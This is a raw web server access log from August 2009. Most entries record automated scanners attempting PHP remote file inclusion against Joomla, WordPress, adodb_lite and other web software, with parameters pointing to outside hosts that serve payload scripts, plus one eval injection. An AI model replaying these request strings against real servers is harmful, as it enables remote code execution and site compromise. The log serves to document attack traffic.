78.110.50.132 - - [02/Aug/2009:01:53:52 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:53:52 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:53:52 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:53:53 -0400] "GET /logs/access_log.Q109070300/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.814"
209.59.12.99 - - [02/Aug/2009:01:54:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.81.182 - - [02/Aug/2009:01:55:09 -0400] "GET /logs/access_log.Q109061700 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.14.123.202 - - [02/Aug/2009:01:55:27 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 287 "-" "libwww-perl/5.813"
216.14.123.202 - - [02/Aug/2009:01:55:27 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.813"
216.14.123.202 - - [02/Aug/2009:01:55:27 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.813"
216.14.123.202 - - [02/Aug/2009:01:55:32 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 287 "-" "libwww-perl/5.813"
93.190.41.97 - - [02/Aug/2009:01:56:53 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.823"
93.190.41.97 - - [02/Aug/2009:01:56:53 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.823"
93.190.41.97 - - [02/Aug/2009:01:56:54 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.823"
93.190.41.97 - - [02/Aug/2009:01:56:55 -0400] "GET /logs/access_log.Q109071100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.823"
78.110.50.132 - - [02/Aug/2009:01:57:59 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:57:59 -0400] "GET //?path%5Bdocroot%5D=http://d2ecars.com//idste.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:58:00 -0400] "GET /logs//?path%5Bdocroot%5D=http://d2ecars.com//idste.txt??? HTTP/1.1" 200 12009 "-" "libwww-perl/5.814"
174.143.240.203 - - [02/Aug/2009:01:58:00 -0400] "GET /logs/access_log.Q109062800//language.php?rootdir=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
78.110.50.132 - - [02/Aug/2009:01:58:00 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:58:00 -0400] "GET //?path%5Bdocroot%5D=http://d2ecars.com//idste.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:58:00 -0400] "GET /logs//?path%5Bdocroot%5D=http://d2ecars.com//idste.txt??? HTTP/1.1" 200 12009 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:58:03 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:58:04 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.814"
174.143.240.203 - - [02/Aug/2009:01:58:10 -0400] "GET /logs/error_log.Q109062800//language.php?rootdir=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
201.232.54.48 - - [02/Aug/2009:01:59:44 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
209.59.12.99 - - [02/Aug/2009:01:59:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.138.88.20 - - [02/Aug/2009:02:00:29 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
193.138.88.20 - - [02/Aug/2009:02:00:29 -0400] "GET /logs/access_log.Q109070800//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
193.138.88.20 - - [02/Aug/2009:02:00:32 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
61.222.190.185 - - [02/Aug/2009:02:00:39 -0400] "GET /index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
61.222.190.185 - - [02/Aug/2009:02:00:39 -0400] "GET /logs/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
61.222.190.185 - - [02/Aug/2009:02:00:39 -0400] "GET /logs/error_log.Q109061000/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
61.222.190.185 - - [02/Aug/2009:02:00:40 -0400] "GET /logs/access_log.Q109061000/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
193.138.88.20 - - [02/Aug/2009:02:00:41 -0400] "GET /logs/access_log.Q109070400//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
93.190.41.97 - - [02/Aug/2009:02:01:38 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.823"
93.190.41.97 - - [02/Aug/2009:02:01:38 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.823"
93.190.41.97 - - [02/Aug/2009:02:01:38 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.823"
213.6.5.177 - - [02/Aug/2009:02:01:43 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; InfoPath.2)"
213.6.5.177 - - [02/Aug/2009:02:01:43 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; InfoPath.2)"
213.6.5.177 - - [02/Aug/2009:02:01:49 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; InfoPath.2)"
213.6.5.177 - - [02/Aug/2009:02:01:49 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; InfoPath.2)"
93.190.41.97 - - [02/Aug/2009:02:01:52 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.823"
93.190.41.97 - - [02/Aug/2009:02:04:33 -0400] "GET /logs/access_log.Q109071100%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.823"
193.138.88.20 - - [02/Aug/2009:02:04:48 -0400] "GET /logs/access_log.Q109070400%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:02:04:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.32.69.162 - - [02/Aug/2009:02:05:09 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sailingshop.gr/components/com_rsgallery2/images/baner.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.32.69.162 - - [02/Aug/2009:02:05:09 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sailingshop.gr/components/com_rsgallery2/images/baner.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.32.69.162 - - [02/Aug/2009:02:05:09 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sailingshop.gr/components/com_rsgallery2/images/baner.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
72.32.69.162 - - [02/Aug/2009:02:05:13 -0400] "GET /logs/error_log.Q109071100//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sailingshop.gr/components/com_rsgallery2/images/baner.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.249.71.201 - - [02/Aug/2009:02:05:45 -0400] "GET /logs/error_log.Q108022300 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.138.88.20 - - [02/Aug/2009:02:05:58 -0400] "GET /logs/error_log.Q109070400%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:06:01 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:06:01 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:06:01 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:06:12 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:06:12 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:06:12 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:06:13 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:06:14 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:06:14 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:06:14 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:06:21 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:06:30 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:07:23 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:07:23 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:07:26 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:07:28 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.32.69.162 - - [02/Aug/2009:02:07:31 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sailingshop.gr/components/com_rsgallery2/images/baner.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:07:32 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:07:32 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:07:32 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
219.117.207.76 - - [02/Aug/2009:02:07:34 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:07:35 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.32.69.162 - - [02/Aug/2009:02:07:35 -0400] "GET /logs/error_log.Q109071100%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sailingshop.gr/components/com_rsgallery2/images/baner.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
219.117.207.76 - - [02/Aug/2009:02:07:39 -0400] "GET /logs/access_log.Q109070800//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
219.117.207.76 - - [02/Aug/2009:02:07:39 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:07:44 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:07:44 -0400] "GET /logs/access_log.Q109070200%20%20//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:07:44 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:07:47 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:07:47 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:07:47 -0400] "GET /logs/access_log.Q109070200%20%20//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:08:02 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:08:02 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:08:02 -0400] "GET /logs/access_log.Q109070200%20%20//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
80.67.26.187 - - [02/Aug/2009:02:08:11 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sailingshop.gr/components/com_rsgallery2/images/baner.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
80.67.26.187 - - [02/Aug/2009:02:08:14 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sailingshop.gr/components/com_rsgallery2/images/baner.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
80.67.26.187 - - [02/Aug/2009:02:08:14 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sailingshop.gr/components/com_rsgallery2/images/baner.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
80.67.26.187 - - [02/Aug/2009:02:08:23 -0400] "GET /logs/error_log.Q109071100//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sailingshop.gr/components/com_rsgallery2/images/baner.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:08:27 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:08:30 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.162.115.67 - - [02/Aug/2009:02:08:37 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://emtk.us/web/copyright.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:02:09:14 -0400] "GET //poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:02:09:15 -0400] "GET /logs//poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:02:09:28 -0400] "GET /logs//poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:02:09:28 -0400] "GET //poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:02:09:29 -0400] "GET /logs//poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:02:09:29 -0400] "GET //poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:02:09:35 -0400] "GET /logs//poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:02:09:35 -0400] "GET //poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
91.192.37.223 - - [02/Aug/2009:02:09:40 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.828"
91.192.37.223 - - [02/Aug/2009:02:09:40 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.828"
91.192.37.223 - - [02/Aug/2009:02:09:41 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.828"
91.192.37.223 - - [02/Aug/2009:02:09:42 -0400] "GET /logs/access_log.Q109072300//bbs//skin/ggambo7002_board/write.php?dir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.828"
92.46.175.14 - - [02/Aug/2009:02:09:55 -0400] "GET /logs//poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
92.46.175.14 - - [02/Aug/2009:02:09:55 -0400] "GET //poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:02:09:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
92.46.175.14 - - [02/Aug/2009:02:10:13 -0400] "GET //poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
92.46.175.14 - - [02/Aug/2009:02:10:13 -0400] "GET /logs//poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
72.30.81.182 - - [02/Aug/2009:02:10:26 -0400] "GET /logs/error_log.Q109071500 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.45.176.74 - - [02/Aug/2009:02:10:51 -0400] "GET /convert/mvcw.php?vwar_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.45.176.74 - - [02/Aug/2009:02:10:51 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
211.45.176.74 - - [02/Aug/2009:02:10:51 -0400] "GET /logs/access_log.Q109061100%20%20/convert/mvcw.php?vwar_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
92.46.175.14 - - [02/Aug/2009:02:11:24 -0400] "GET //poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
92.46.175.14 - - [02/Aug/2009:02:11:24 -0400] "GET /logs//poll/png.php?include_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
91.192.37.223 - - [02/Aug/2009:02:11:50 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.192.37.223 - - [02/Aug/2009:02:11:50 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.192.37.223 - - [02/Aug/2009:02:11:50 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
91.192.37.223 - - [02/Aug/2009:02:11:50 -0400] "GET /logs/access_log.Q109072300//bbs//skin/ggambo7002_board/write.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.45.176.74 - - [02/Aug/2009:02:11:51 -0400] "GET /logs/access_log.Q109062100%20%20/convert/mvcw.php?vwar_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:11:52 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
